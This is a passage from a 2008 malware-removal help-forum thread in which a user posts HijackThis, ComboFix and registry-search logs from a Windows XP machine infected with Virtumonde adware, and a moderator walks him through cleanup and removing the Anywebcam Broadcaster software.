O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 11080 bytes

#8 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 17 June 2008 - 10:04 AM

ComboFix log file:

ComboFix 08-06-16.3 - Ahmed Fahmy 2008-06-17 17:36:54.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1426 [GMT 3:00]
Running from: C:\Documents and Settings\Ahmed Fahmy\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\Ahmed Fahmy\Desktop\CFScript.txt
* Created a new restore point
* Resident AV is active


FILE ::
C:\WINDOWS\system32\ccrrhydm.dll
C:\WINDOWS\system32\epwhgnjp.dll
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\qoMdabXo.dll
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\WINDOWS\BMcfa4d225.xml
C:\WINDOWS\pskt.ini
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\gjkSCJjl.ini
C:\WINDOWS\system32\gjkSCJjl.ini2
C:\WINDOWS\system32\jknllmav.ini
C:\WINDOWS\system32\lpecesnx.ini
C:\WINDOWS\system32\mcrh.tmp
C:\WINDOWS\system32\mdyhrrcc.ini
C:\WINDOWS\system32\oXbadMoq.ini
C:\WINDOWS\system32\oXbadMoq.ini2

.
((((((((((((((((((((((((( Files Created from 2008-05-17 to 2008-06-17 )))))))))))))))))))))))))))))))
.

2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-06-17 16:28 . 2008-06-17 16:28 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\Malwarebytes
2008-06-17 16:28 . 2008-06-10 19:02 34,296 --a------ C:\WINDOWS\system32\drivers\mbamcatchme.sys
2008-06-17 16:28 . 2008-06-10 19:02 15,864 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-06-13 05:35 . 2008-06-13 05:35 <DIR> d-------- C:\Program Files\IBP 9
2008-06-13 05:35 . 2008-06-17 06:52 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\IBP
2008-06-13 03:55 . 2008-06-13 03:55 23 --a------ C:\WINDOWS\system32\pmac64.dll
2008-06-12 16:24 . 2008-06-12 16:24 <DIR> d-------- C:\Documents and Settings\Guest\Application Data\Talkback
2008-06-12 04:14 . 2008-06-17 03:08 <DIR> d-------- C:\Program Files\EmailMarketingDirector
2008-06-12 00:01 . 2008-04-14 14:01 272,128 --------- C:\WINDOWS\system32\drivers\bthport.sys
2008-06-12 00:01 . 2008-04-14 14:01 272,128 --------- C:\WINDOWS\system32\dllcache\bthport.sys
2008-06-10 16:06 . 2008-06-10 16:07 <DIR> d-------- C:\Program Files\SystemRequirementsLab
2008-06-10 16:06 . 2008-06-10 16:06 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\SystemRequirementsLab
2008-06-07 00:46 . 2008-06-07 00:46 <DIR> d-------- C:\Program Files\Site Map Maker
2008-06-01 17:33 . 2008-06-01 17:33 <DIR> d-------- C:\players
2008-05-30 21:01 . 2008-05-30 21:01 <DIR> d-------- C:\Program Files\iTunes
2008-05-30 21:01 . 2008-05-30 21:01 <DIR> d-------- C:\Program Files\iPod
2008-05-30 21:01 . 2008-06-13 20:57 54,156 --ah----- C:\WINDOWS\QTFont.qfn
2008-05-30 21:01 . 2008-05-30 21:01 1,409 --a------ C:\WINDOWS\QTFont.for
2008-05-30 20:58 . 2008-05-30 20:58 <DIR> d-------- C:\Program Files\Common Files\Apple
2008-05-27 03:07 . 2008-06-03 01:31 <DIR> d-------- C:\Program Files\Tiger Gaming
2008-05-20 10:10 . 2008-05-20 10:10 <DIR> d-------- C:\Documents and Settings\Ahmed Fahmy\Application Data\Talkback
2008-05-19 22:40 . 2008-06-17 07:05 <DIR> d-------- C:\Program Files\Mozilla Firefox2

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-17 02:47 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\FileZilla
2008-06-16 21:54 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-06-16 20:52 --------- d-----w C:\Documents and Settings\All Users\Application Data\Viewpoint
2008-06-11 00:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Microsoft Help
2008-06-05 23:48 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\Paltalk
2008-05-30 18:01 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-30 18:01 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\Apple Computer
2008-05-30 18:00 --------- d-----w C:\Program Files\QuickTime
2008-05-30 17:29 --------- d-----w C:\Program Files\Safari
2008-05-30 17:19 --------- d-----w C:\Program Files\Apple Software Update
2008-05-10 08:01 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-10 08:00 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\AdobeUM
2008-05-08 12:28 202,752 ----a-w C:\WINDOWS\system32\drivers\rmcast.sys
2008-05-02 13:47 --------- d-----w C:\Program Files\anywebcam
2008-05-02 13:44 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-02 13:44 --------- d-----w C:\Program Files\Disney Interactive
2008-05-02 13:44 --------- d-----w C:\Program Files\AIM6
2008-05-02 13:44 --------- d-----w C:\Documents and Settings\Ahmed Fahmy\Application Data\mIRC
2007-09-09 22:02 32 ----a-r C:\Documents and Settings\All Users\hash.dat
2007-02-25 16:10 74,304 -c--a-w C:\Program Files\MC
2007-02-18 22:11 0 ----a-w C:\Documents and Settings\Ahmed Fahmy\Application Data\wklnhst.dat
2007-10-17 14:21 88 --sh--r C:\WINDOWS\system32\66816824E3.sys
2007-10-17 14:21 2,984 --sha-w C:\WINDOWS\system32\KGyGaAvL.sys
.
<pre>
----a-w		 6,382,974 2008-03-13 00:35:12  C:\Downloads\Cucusoft Ultimate DVD + Video Converter Suite\Cucusoft Apple TV Video Converter .exe
----a-w		 8,340,465 2008-03-13 00:25:59  C:\Downloads\Cucusoft Ultimate DVD + Video Converter Suite\Cucusoft Ultimate DVD + Video Converter Suite .exe
</pre>


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-10 14:00 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Broadcom Wireless Manager UI"="C:\WINDOWS\system32\WLTRAY.exe" [2006-11-23 09:35 1392640]
"ISUSPM Startup"="C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe" [2004-07-28 01:50 221184]
"SmcService"="C:\PROGRA~1\Sygate\SPF\smc.exe" [2004-08-13 20:05 2532576]
"nod32kui"="C:\Program Files\Eset\nod32kui.exe" [2007-04-08 18:35 949376]
"GrooveMonitor"="C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-27 00:47 31016]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 05:25 144784]
"VMSnap3"="C:\WINDOWS\VMSnap3.EXE" [2006-08-30 05:58 49152]
"Domino"="C:\WINDOWS\Domino.EXE" [2006-06-28 12:54 49152]

C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\Startup\
Adobe Gamma.lnk - C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-03-16 20:16:50 113664]
Yahoo! Widget Engine.lnk - C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe [2007-07-20 20:57:16 2913584]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe [2006-05-25 03:28:28 622653]
Digital Line Detect.lnk - C:\Program Files\Digital Line Detect\DLG.exe [2006-12-14 22:22:20 24576]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"InstallVisualStyle"= C:\WINDOWS\Resources\Themes\Royale\Royale.msstyles
"InstallTheme"= C:\WINDOWS\Resources\Themes\Royale.theme

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.ffds"= ffdshow.ax
"vidc.DIV3"= DivXc32.dll
"vidc.DIV4"= DivXc32f.dll
"msacm.divxa32"= DivXa32.acm
"msacm.lameacm"= LameACM.dll

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run-]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe
"DellSupport"="C:\Program Files\Dell Support\DSAgnt.exe" /startup
"googletalk"="C:\Program Files\Google\Google Talk\googletalk.exe" /autostart
"ModemOnHold"=C:\Program Files\NetWaiting\netWaiting.exe
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
"msnmsgr"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
"Yahoo! Pager"="C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"QuickTime Task"="C:\Program Files\QuickTime\qttask.exe" -atboottime
"ATICCC"="C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
"PCMService"="C:\Program Files\Dell\MediaDirect\PCMService.exe"
"DAEMON Tools-1033"="C:\Program Files\D-Tools\daemon.exe" -lang 1033
"Google Desktop Search"="C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
"ehTray"=C:\WINDOWS\ehome\ehtray.exe
"SigmatelSysTrayApp"=stsystra.exe
"dla"=C:\WINDOWS\system32\dla\tfswctrl.exe
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
"VMSnap3"=C:\WINDOWS\VMSnap3.EXE
"Domino"=C:\WINDOWS\Domino.EXE
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Dell Network Assistant\\ezi_hnm2.exe"=
"C:\\Program Files\\Common Files\\AOL\\ACS\\AOLDial.exe"=
"C:\\Program Files\\Common Files\\AOL\\ACS\\AOLacsd.exe"=
"C:\\Program Files\\Dell\\MediaDirect\\PCMService.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"C:\\Program Files\\America Online 9.0\\waol.exe"=
"C:\\Program Files\\Google\\Google Talk\\googletalk.exe"=
"C:\\Program Files\\BitSpirit\\BitSpirit.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\Autodesk\\3ds Max 9\\3dsmax.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\monitor.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\manager.exe"=
"C:\\Program Files\\Autodesk\\Backburner\\server.exe"=
"C:\\Program Files\\Yahoo!\\Yahoo! Music Jukebox\\YahooMusicEngine.exe"=
"C:\\Program Files\\TVUPlayer\\TVUPlayer.exe"=
"C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=
"C:\\Program Files\\Microsoft Office\\Office12\\GROOVE.EXE"=
"C:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"C:\\Program Files\\AIM6\\aim6.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=
"C:\\Program Files\\backburner 2\\monitor.exe"=
"C:\\Program Files\\backburner 2\\manager.exe"=
"C:\\Program Files\\backburner 2\\server.exe"=
"C:\\Program Files\\discreet\\combustion 4\\combustion.exe"=
"C:\\Program Files\\SopCast\\adv\\SopAdver.exe"=
"C:\\Program Files\\SopCast\\SopCast.exe"=
"C:\\Program Files\\Internet Explorer\\iexplore.exe"=
"C:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"C:\\Program Files\\Microsoft Games\\Midtown Madness 2\\Midtown2.exe"=
"C:\\Program Files\\Shareaza\\Shareaza.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Real\\RealPlayer\\realplay.exe"=
"C:\\WINDOWS\\system32\\usmt\\migwiz.exe"=
"C:\\Program Files\\iTunes\\iTunes.exe"=
"C:\\Program Files\\IBP 9\\IBP.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"10421:UDP"= 10421:UDP:SingleClick Discovery Protocol
"10426:UDP"= 10426:UDP:SingleClick ICC

R0 pnpshark;pnpshark;C:\WINDOWS\system32\DRIVERS\pnpshark.sys [2003-10-02 11:16]
R0 st3shark;st3shark;C:\WINDOWS\system32\DRIVERS\st3shark.sys [2003-09-27 22:37]
R2 hnmwrlspkt;HomeNet Manager Wireless Protocol;C:\WINDOWS\system32\DRIVERS\hnm_wrls_pkt.sys [2006-07-14 10:01]
R2 wsppkt;Wireless Security Protocol;C:\WINDOWS\system32\DRIVERS\wsp_pkt.sys [2006-07-14 10:02]
S3 PAC207;FlyCam USB 100 XP3;C:\WINDOWS\system32\DRIVERS\pfc027.sys [2005-01-25 16:20]
S3 vmfilter303;vmfilter303;C:\WINDOWS\system32\drivers\vmfilter303.sys [2006-04-25 05:57]
S3 Wdm1;USB Bridge Cable Driver;C:\WINDOWS\system32\Drivers\usbbc.sys [2001-01-08 04:53]

.
Contents of the 'Scheduled Tasks' folder
"2008-06-06 14:15:00 C:\WINDOWS\Tasks\1-Click Maintenance.job"
- C:\Program Files\TuneUp Utilities 2006\SystemOptimizer.exe
"2008-05-30 17:19:12 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-17 17:45:44
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
"ImagePath"="\"C:\Program Files\MySQL\MySQL Server 5.0\bin\mysqld-nt\" --defaults-file=\"C:\Program Files\MySQL\MySQL Server 5.0\my.ini\" MySQL"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vsdatant]
"ImagePath"=""
.
------------------------ Other Running Processes ------------------------
.
C:\WINDOWS\system32\ati2evxx.exe
C:\Program Files\Sygate\SPF\Smc.exe
C:\WINDOWS\system32\WLTRYSVC.EXE
C:\WINDOWS\system32\BCMWLTRY.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\ehome\ehrecvr.exe
C:\WINDOWS\ehome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\ESET\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PAStiSvc.exe
C:\WINDOWS\ehome\mcrdsvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\ati2evxx.exe
.
**************************************************************************
.
Completion time: 2008-06-17 17:58:38 - machine was rebooted
ComboFix-quarantined-files.txt 2008-06-17 14:58:28

Pre-Run: 25,181,650,944 bytes free
Post-Run: 25,312,124,928 bytes free

247 --- E O F --- 2008-06-12 00:04:25

#9 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 17 June 2008 - 10:21 AM

No more automatic updates error messages and so far NOD32 detects nothing. I ran NOD32 on win32 folder specificalaly and no threats were found.

by the way, how to uninstall anywebcam broadcaster software. There is no uninstall option and the program doesn't appear in add/remove programs nor in tuneup utilities program list. I have been trying with this for weeks now.

Edited by a_fahmy7, 17 June 2008 - 10:33 AM.


#10 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 17 June 2008 - 03:51 PM

ok, infection is still there it seems, NOD 32 detected the same Adware.Virtumonde.

File: C:\system volume information\_restore {129201FA-B0AC-49B3-96B2-DEB8...\A0093271.DLL and A0093272.DLL



says they have been moved to quarantine ..

#11 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 17 June 2008 - 07:39 PM

ok, infection is still there it seems, NOD 32 detected the same Adware.Virtumonde.

File: C:\system volume information\_restore {129201FA-B0AC-49B3-96B2-DEB8...\A0093271.DLL and A0093272.DLL

Anything in System Restore is not a problem. The files or registry entries are not active. Everything in System Restore will be deleted and a new Restore Point set as we clean up from the infection.

Go to start > run and copy and paste next command in the field:
ComboFix /u

Make sure there's a space between Combofix and /
Then hit enter.

This will uninstall Combofix, delete its related folders and files, reset your clock settings, hide file extensions, hide the system/hidden files and resets System Restore again.

Create a Restore Point
  • Go to Start > Programs > Accessories > System Tools > System Restore
  • Select Create a Restore Point and then Next.
  • In the box for "Restore point description", enter a descriptive name and press Create
  • When the "Restore Point Created" window appears, click Close
Run Disk Cleanup
  • Go to Start > Run and type the below line:
    cleanmgr
  • Click OK
    • If you have more than one drive, select the drive Windows is installed on
    • Click OK
  • When Disk Cleanup opens, select the More Options tab
  • In the System Restore section (bottom of window), click Cleanup
    • In the confirmation window that opens, click Yes
  • Now click on the Disk Cleanup tab and select the following items:
    • Downloaded Program Files
    • Temporary Internet Files
    • Recycle Bin
    • Temporary Files
  • Click OK
  • in the confirmation window, select Yes (Disk Cleanup will close).

by the way, how to uninstall anywebcam broadcaster software. There is no uninstall option and the program doesn't appear in add/remove programs nor in tuneup utilities program list. I have been trying with this for weeks now.


There doesn't appear to be any automated way to remove Anywebcam Broadcaster. I found a review where someone posted a reply frying the reviewer for not pointing out little things like it was adult software being offered an a teen site, they use still from any video you broadcast in their adult ads, and that there is no uninstaller for the software.

That seems correct, as I was unable to locate an uninstaller. Googling for "uninstall anywebcam", you find http://anywebcam.qarchive.org/, which seems strange since that text doesn't display on the web site. Searching the page source, you can find that This embedded in the page:
.http://uninstall-anywebcam.qarchive.org
What it takes you to though, is ads for other software.
You could ask the question at http://support.anywebcam.com, but since Google shows no instance of the word uninstall on their site (Google for uninstall site:support.anywebcam.com), I wouldn't hold my breath.

There are two options.

1. You could download a free or trial uninstaller like Total Uninstall and then attempt to remove it with that software.
2. Do a search for the executable in the registry and see what we can delete, along with the program folder.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#12 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 18 June 2008 - 08:47 AM

Thanks a lot for your efforts :)

Concerning Broadcaster: 1) Total uninstall seems a nice program ,but still it didn't list anywebcam or broadcaster as well :(

2) Registry searching for both strings "anywebcam" and "broadcaster" revealed:

- HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\Broadcaster
- HKEY_USERS\S-1-5-21-3626108329-3047563160-3139894105-1006\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Anywebcam

-c:\program files\anywebcam\broadcaster.exe
type: REG_SZ
Data: Broadcaster



can i just delete the progrma folder and then use tuneup utilities to fix the registry and delete missing keys? of course it would be still risky

What do u think?

#13 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 18 June 2008 - 05:05 PM

Instead of simply deleting the folder, we can use a utility that will also unregister any of the files when they are deleted.

can i just delete the progrma folder and then use tuneup utilities to fix the registry and delete missing keys? of course it would be still risky

You could, and yes that can tend to be risky. Unless you are certain of each key suggested for deletion, for instance checking closely on what they are, a registry cleaner can be a faster way to damage the registry than can be done manually. For instance, if you have Office installed, I've seen a registry cleaner damage the installation deleting so called orphaned keys to the point that none of the Office programs will start. Let's start with getting a list of the keys based on the terms you used, only in the format I need them to build a .reg file that will remove those entries.

Download Registry Search by Bobbi Flekman, save it, and extract regsearch.exe to the Desktop. You will use it in a moment.

Doubleclick regsearch.exe to start it. In the top window, enter anywebcam as the search string on the first line, and on the line below it, enter broadcaster. Make sure all the option boxes are checked, and click "Ok". Notepad will be opened with text in it (the file will be saved to the Desktop as well as RegSearch.txt). Post this text in your next reply.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#14 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 19 June 2008 - 09:10 AM

Windows Registry Editor Version 5.00

; Registry Search 2.0 by Bobbi Flekman © 2005
; Version: 2.0.5.0

; Results at 6/19/2008 5:07:25 PM for strings:
; 'anywebcam '
; 'broadcaster'
; Strings excluded from search:
; (None)
; Search in:
; Registry Keys Registry Values Registry Data
; HKEY_LOCAL_MACHINE HKEY_USERS


[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\avatar7]
"Broadcaster.AllowCapture"="False"

[HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam\Broadcaster]

[HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Modules\Imon\Settings]
"UserAgentList"="Acrobat Messages Updater\\AcroRd32.exe|ACS 4166.1281\\AOLacsd.exe|ActEXE\\act.exe|Adobe Flash Player Downloader\\Download.exe|Adobe Flash Player Installation Reporter\\Download.exe|Adobe Update Manager\\AdobeUpdateManager.exe|AdobeStockPhotos\\Bridge.exe|Apple-PubSub/61\\Safari.exe|Apple-PubSub/65\\Safari.exe|AtomicMailSender3\\AtomicMailSender.exe|AWCRequester\\firefox.exe|BFTS/2.0\\aolsoftware.exe|BitTorrent/4.1.2\\BitSpirit.exe|Borland SOAP 1.2\\Metacafe.exe|Broadcaster/3.0\\Bac.exe|Broadcaster/3.0\\Broadcaster.exe|Campaign Broswer\\EmailMarketingDirector4.exe|Client\\IEXPLORE.EXE|ClipOrganizer\\MSTORDB.EXE|contype\\firefox.exe|Cortado/0.2.2 Sun/1.6.0_03 Mozilla/4.0\\firefox.exe|DigitAl56K/6.3.0.0\\DivXConnectionTester.exe|DivX Player 2.0\\DivX Player.exe|dwplayer\\ymp7EB.tmp|Dynamic Update\\winnt32.exe|ee://aol/http\\aim6.exe|ee://aol/http\\aolsoftware.exe|ESDConnector\\AdobeUpdater.exe|ESDConnector\\ahc.exe|FileZilla 3.0.4.1\\filezilla.exe|Google Talk\\googletalk.exe|gSOAP/2.7\\YahooMessenger.exe|gSOAP/2.7\\YAHOOM~1.EXE|HelpSupportServices\\HelpCtr.exe|HelpSupportServices\\HelpHost.exe|HP Lookup Agent\\hpzwup01.exe|HP\\hpqtra08.exe|hprbUpdate\\hprbUpdate.exe|InternetUtil\\hpzwup01.exe|iTunes/7.6.2\\iTunes.exe|Java/1.6.0_03\\javaw.exe|JDeveloper/10.1.3.2.0\\jdevw.exe|jupdate\\jre-6u2-windows-i586-p-iftw_7070c3f7.exe|jupdate\\jre-6u3-windows-i586-p-iftw_2cd32978.exe|jupdate\\jre-6u5-windows-i586-p-iftw_1b121abb.exe|jupdate\\jucheck.exe|jupdate\\jusched.exe|LegitCheck\\firefox.exe|LegitCheck\\wgatray.exe|Logitech Video\\msnmsgr.exe|Megaupload\\IEXPLORE.EXE|Messenger Stats Client\\msnmsgr.exe|MessengerPlusLive\\msnmsgr.exe|MetacafeDownloader\\RunDll32.exe|Microsoft BITS/6.6\\svchost.exe|Microsoft Internet Explorer\\fds.exe|Microsoft Office/11.0\\WINWORD.EXE|Microsoft Office/12.0\\CLVIEW.EXE|Microsoft Office/12.0\\OUTLOOK.EXE|Microsoft Office/12.0\\WINWORD.EXE|Microsoft URL Control - 6.00.8862\\Athan.exe|Microsoft URL Control - 6.00.8862\\PrepLogic Practice 